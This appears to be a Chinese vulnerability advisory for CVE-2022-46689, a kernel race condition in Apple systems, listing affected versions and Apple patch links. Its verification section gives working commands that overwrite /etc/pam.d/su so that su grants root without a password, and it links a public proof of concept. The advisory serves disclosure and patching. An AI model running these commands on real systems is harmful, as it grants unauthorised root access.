CVE-2022-46689|Apple 多个产品权限提升漏洞

简介: CVE-2022-46689|Apple 多个产品权限提升漏洞

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

Apple 多个产品内核存在条件竞争漏洞,成功利用此漏洞的攻击者可使用内核权限执行任意代码。

风险等级

高危

影响版本

macOS 13.0.1 / 12.6.1(或更低版本)

tvOS < 16.2

iOS / iPadOS < 16.2

iOS / iPadOS < 15.7.2

watchOS < 9.2

漏洞验证

以macOS为例

clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

图片

「poc」

https://github.com/zhuowei/MacDirtyCowDemo

修复方案

目前官方已发布可更新版本,建议受影响用户升级至补丁版本

https://support.apple.com/en-us/HT213531

https://support.apple.com/en-us/HT213532

https://support.apple.com/en-us/HT213530

https://support.apple.com/en-us/HT213535

https://support.apple.com/en-us/HT213536

https://support.apple.com/en-us/HT213533

https://support.apple.com/en-us/HT213534

目录
相关文章
|
安全 数据挖掘
CVE-2021-41277——Metabase 信息泄露漏洞
CVE-2021-41277——Metabase 信息泄露漏洞
651 0
CVE-2021-41277——Metabase 信息泄露漏洞
|
4月前
|
安全 编译器
【Azure 环境】Azure 云环境对于OpenSSL 3.x 的严重漏洞(CVE-2022-3602 和 CVE-2022-3786)的处理公告
【Azure 环境】Azure 云环境对于OpenSSL 3.x 的严重漏洞(CVE-2022-3602 和 CVE-2022-3786)的处理公告
|
安全 Linux
Linux 系统安全 - 近期发现的 polkit pkexec 本地提权漏洞(CVE-2021-4034)修复方案
Linux 系统安全 - 近期发现的 polkit pkexec 本地提权漏洞(CVE-2021-4034)修复方案
1324 2
|
安全 Ubuntu Linux
polkit的pkexec中的本地权限提升漏洞(CVE-2021-4034)
polkit的pkexec中的本地权限提升漏洞(CVE-2021-4034)
490 0
|
安全 Linux
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
803 0
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
|
安全 Ubuntu Unix
2022渗透测试-最好用的权限提升方法-CVE-2021-4034
2022渗透测试-最好用的权限提升方法-CVE-2021-4034
2022渗透测试-最好用的权限提升方法-CVE-2021-4034
|
供应链 安全 IDE
Jira Seraph 中的身份验证绕过漏洞(CVE-2022-0540)
Jira Seraph 中的身份验证绕过漏洞(CVE-2022-0540)
|
Kubernetes 安全 API
关于Kubernetes CVE-2018-1002105 提权漏洞的修复公告
近日Kubernetes社区发现安全漏洞 CVE-2018-1002105。通过伪造请求,Kubernetes用户可以在已建立的API Server连接上提权访问后端服务,阿里云容器服务已第一时间修复,请登录阿里云控制台升级您的Kubernetes版本。
5315 0
|
安全 Java Apache
Struts2升级版本至2.5.10,高危漏洞又来了
前情概要 漏洞年年有,最近特别多。2017年3月6日,Apache Struts2被曝存在远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行任意系统命令,导致系统被黑客入侵。
7155 0
|
Web App开发 安全
50%带毒网站利用IE新漏洞 用户应打好补丁
12月27日,一个名为“IE7攻击代码(Hack.Exploit.Script.JS.Agent.ic)”的恶意代码本周特别值得注意,它自上周出现后,疯狂势头一直未减。根据瑞星“云安全”系统提供的数据,每天有22万例网络攻击利用该漏洞进行,占据总体网络攻击比例的50%以上,尽管微软已经发布了针对该漏洞的补丁,但很多用户还没来得及弥补,预计此类攻击将持续相当长的时间。
897 0